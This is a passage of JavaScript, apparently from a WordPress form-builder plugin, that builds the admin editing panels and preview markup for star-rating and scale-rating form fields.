	select_.style.cssText = "width:30px; margin:2px 0px";
		
	var select_label = document.createElement('label');
			select_label.innerHTML =  "<!--repstart-->Quantity<!--repend-->";
			select_label.style.cssText = "margin-right:5px";		
			select_label.setAttribute("class", 'mini_label');
			select_label.setAttribute("id", i+'_element_quantity_label_form_id_temp');

		var span_ = document.createElement('span');
			span_.style.cssText = "margin-right:15px";
			span_.setAttribute("id", i+'_element_quantity_spanform_id_temp');
			
		span_.appendChild(select_label);
		span_.appendChild(select_);
		if(div_.firstChild)
			div_.insertBefore(span_, div_.firstChild);
		else
			div_.appendChild(span_);

}



function dis_option(id, value, num)
{
	if(value)
	{
		jQuery(id).val('');
		
		jQuery('#el_option_value'+num).val('');
	}	
	else
	{
		jQuery(id).val(jQuery(id).html());
		jQuery('#el_option_value'+num).val(jQuery('#el_option'+num).val());
	}	

}


function type_star_rating(i, w_field_label, w_field_label_size, w_field_label_pos, w_field_label_col, w_star_amount, w_required, w_class, w_attr_name, w_attr_value){

    document.getElementById("element_type").value="type_star_rating";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');	
	var edit_main_tr8  = document.createElement('tr');
	
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');	
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');

	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");		
		
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_star_size_label = document.createElement('label');
		el_star_size_label.setAttribute("class", "fm-field-label");
		el_star_size_label.setAttribute("for", "edit_for_star_size");
		el_star_size_label.innerHTML = "Star Amount ";
	
	var el_star_size_input = document.createElement('input');
		el_star_size_input.setAttribute("type", "text");		
		el_star_size_input.setAttribute("id", "edit_for_star_size");		
		el_star_size_input.setAttribute("value", w_star_amount);
		el_star_size_input.setAttribute("onKeyPress", "return check_isnum(event)");	
		el_star_size_input.setAttribute("onKeyUp", "change_star_amount(this.value,"+i+",'form_id_temp')");
           
	var el_star_color_label = document.createElement('label');
	    el_star_color_label.setAttribute("class", "fm-field-label");
	    el_star_color_label.setAttribute("for", "edit_for_label_color");
		el_star_color_label.innerHTML = "Star Color";
	
	var el_star_color = document.createElement('select');
		el_star_color.setAttribute("id", "edit_for_label_color");
		el_star_color.setAttribute("name", "edit_for_label_color");
		el_star_color.setAttribute("onchange", "label_color(this.value,"+i+")");
		el_star_color.style.cssText = 'width:200px';
                
	var el_star_color1 = document.createElement('option');
		el_star_color1.setAttribute("id", "edit_for_label_color_yellow");
		el_star_color1.setAttribute("value", "yellow");
		Yellow = document.createTextNode("Yellow");

    var el_star_color2 = document.createElement('option');
		el_star_color2.setAttribute("id", "edit_for_label_color_green");
		el_star_color2.setAttribute("value", "green");
		Green = document.createTextNode("Green");

    var el_star_color3 = document.createElement('option');
		el_star_color3.setAttribute("id", "edit_for_label_color_blue");
		el_star_color3.setAttribute("value", "blue");
		Blue = document.createTextNode("Blue");

    var el_star_color4 = document.createElement('option');
		el_star_color4.setAttribute("id", "edit_for_label_color_red");
		el_star_color4.setAttribute("value", "red");				
		Red = document.createTextNode("Red");              
	
		if(w_field_label_col=="yellow")
			el_star_color1.setAttribute("selected", "selected");
		else
		{
			if(w_field_label_col=="green")
				el_star_color2.setAttribute("selected", "selected");
			else{
				if(w_field_label_col=="blue")
					el_star_color3.setAttribute("selected", "selected");
				else{
					if(w_field_label_col=="red")
						el_star_color4.setAttribute("selected", "selected");
				}
			}
		}

	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "element_style");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("disabled", "disabled");
		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_send");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_send");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("value", "yes");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required=="yes")
			el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("id", "el_choices_add");
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_star_rating')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++) {	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_star_rating')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_star_rating')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_star_rating')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	edit_main_td8.appendChild(el_label_size_label);
	edit_main_td8_1.appendChild(el_label_size);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_star_size_label);
	edit_main_td3_1.appendChild(el_star_size_input);

    edit_main_td4.appendChild(el_star_color_label);
	el_star_color1.appendChild(Yellow);
	el_star_color2.appendChild(Green);
	el_star_color3.appendChild(Blue);
	el_star_color4.appendChild(Red);
	
	el_star_color.appendChild(el_star_color1);
	el_star_color.appendChild(el_star_color2);
	el_star_color.appendChild(el_star_color3);
	el_star_color.appendChild(el_star_color4);
	
	edit_main_td4_1.appendChild(el_star_color);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br1);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
    edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);

	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_star_rating");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");
		adding_required.setAttribute("id", i+"_requiredform_id_temp");
		
	var adding_star_amount = document.createElement("input");
		adding_star_amount.setAttribute("type", "hidden");
		adding_star_amount.setAttribute("value", w_star_amount);
		adding_star_amount.setAttribute("id", i+"_star_amountform_id_temp");
		adding_star_amount.setAttribute("name", i+"_star_amountform_id_temp");
			
	var adding_star_color = document.createElement("input");
		adding_star_color.setAttribute("type", "hidden");
		adding_star_color.setAttribute("value", w_field_label_col);
		adding_star_color.setAttribute("name", i+"_star_colorform_id_temp");	
		adding_star_color.setAttribute("id", i+"_star_colorform_id_temp");		
			
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
	
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
	
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.cssText = "display:table-cell; vertical-align:top; width:"+w_field_label_size+"px;";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
	
	var div1 = document.createElement('div');	
		div1.setAttribute("id", i+"_elementform_id_temp");
		div1.setAttribute("class", "wdform_stars");
		
	var br1 = document.createElement('br');

	
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "label");
	
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		if(w_required=="yes")
			required.innerHTML = " *";
	var main_td  = document.getElementById('show_table');
  
	div_label.appendChild(label);
	div_label.appendChild(required);
	div_element.appendChild(adding_type);
	div_element.appendChild(adding_required);
	div_element.appendChild(adding_star_amount);
	div_element.appendChild(adding_star_color);
		    		
    for(var j=0;j<w_star_amount;j++){	
		var adding = document.createElement("img");
			adding.setAttribute('id', i+'_star_'+j);
			adding.setAttribute('src', plugin_url + '/images/star.png');
			adding.setAttribute('onmouseover', "change_src("+j+","+i+",'form_id_temp')");
			adding.setAttribute('onmouseout', "reset_src("+j+","+i+")");
			adding.setAttribute('onclick', "select_star_rating("+j+","+i+",'form_id_temp')");
	   
      	div1.appendChild(adding);
	}	
	
	div_element.appendChild(div1);
		
	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
  
	div.appendChild(div_field);
	div.appendChild(br1);
	main_td.appendChild(div);
	if(w_field_label_pos=="top")
		label_top(i);
	
	change_class(w_class, i);
	refresh_attr(i, 'type_star_rating');
}

function change_src(b,id,form_id)
{
	for(var j=0;j<=b;j++)
	document.getElementById(id+'_star_'+j).src=plugin_url + "/images/star_"+document.getElementById(id+'_star_colorform_id_temp').value+".png";
}


function reset_src(b,id)
{
	for(var j=0;j<=b;j++)
	document.getElementById(id+'_star_'+j).src=plugin_url + "/images/star.png";
}

function select_star_rating(id,a,form_id){}

function change_star_amount(b,id,form_id)
{
	var td=document.getElementById(id+"_element_sectionform_id_temp");
	var div=document.getElementById(id+"_elementform_id_temp");
	td.removeChild(div);

	var div1 = document.createElement('div');	
				div1.setAttribute("id", id+"_elementform_id_temp");
			
	for(var j=0;j<b;j++)
	{	
		var adding_img=document.createElement("img");
			adding_img.setAttribute('id', id+'_star_'+j);
			adding_img.setAttribute('src', plugin_url + '/images/star.png');
			adding_img.setAttribute('onmouseover', "change_src("+j+","+id+",'form_id_temp')");
			adding_img.setAttribute('onmouseout', "reset_src("+j+","+id+")");
			adding_img.setAttribute('onclick', "select_star_rating("+j+","+id+",'form_id_temp')");
			
      	div1.appendChild(adding_img);
		
	}
	
	td.appendChild(div1);
	document.getElementById(id+'_star_amountform_id_temp').value=b;
}

function label_color(b,id)
{
	document.getElementById(id+'_star_colorform_id_temp').value=b;
}


function type_scale_rating(i, w_field_label, w_field_label_size, w_field_label_pos, w_mini_labels, w_scale_amount, w_required, w_class, w_attr_name, w_attr_value){

    document.getElementById("element_type").value="type_scale_rating";
	delete_last_child();

	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');		
	var edit_main_tr2  = document.createElement('tr');	
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');	
	var edit_main_tr5  = document.createElement('tr');		
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');

	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
		
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
		  
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
		
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");		
		
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_scale_amount_label = document.createElement('label');
		el_scale_amount_label.setAttribute("class", "fm-field-label");
		el_scale_amount_label.setAttribute("for", "edit_for_scale_amount");
		el_scale_amount_label.innerHTML = "Scale Amount ";
	
	var el_scale_amount_input = document.createElement('input');
		el_scale_amount_input.setAttribute("type", "text");		
		el_scale_amount_input.setAttribute("id", "edit_for_scale_amount");		
		el_scale_amount_input.setAttribute("value", w_scale_amount);	
		el_scale_amount_input.setAttribute("onKeyPress", "return check_isnum(event)");	
		el_scale_amount_input.setAttribute("onKeyUp", "change_scale_amount(this.value,"+i+",'form_id_temp')");
           
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "element_style");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_send");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_send");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("value", "yes");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required=="yes")
			el_required.setAttribute("checked", "checked");
	
	var el_attr_label = document.createElement('label');
	    el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("id", "el_choices_add");
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_scale_rating')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_scale_rating')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_scale_rating')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_scale_rating')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}
		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td9.appendChild(el_label_size_label);
	edit_main_td9_1.appendChild(el_label_size);
edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_scale_amount_label);
	edit_main_td3_1.appendChild(el_scale_amount_input);
	
	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	edit_main_td7.appendChild(el_required_label);
	edit_main_td7_1.appendChild(el_required);
	
	
	
	edit_main_td8.appendChild(el_attr_label);
	edit_main_td8.appendChild(el_attr_add);
	edit_main_td8.appendChild(br1);
	edit_main_td8.appendChild(el_attr_table);
	edit_main_td8.setAttribute("colspan", "2");
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);

	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
 
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr8);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);

	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_scale_rating");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");	
		adding_required.setAttribute("id", i+"_requiredform_id_temp");

	var adding_scale_amount = document.createElement("input");
		adding_scale_amount.setAttribute("type", "hidden");
		adding_scale_amount.setAttribute("value", w_scale_amount);
		adding_scale_amount.setAttribute("id", i+"_scale_amountform_id_temp");
		adding_scale_amount.setAttribute("name", i+"_scale_amountform_id_temp");
	
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
	
	edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");
	
	var div_for_editable_labels = document.createElement('div');
		div_for_editable_labels.setAttribute("class", "fm-editable-label");
		
	div_for_editable_labels.appendChild(edit_labels);  
	
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.cssText = "display:table-cell; vertical-align:top; width:"+w_field_label_size+"px;";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
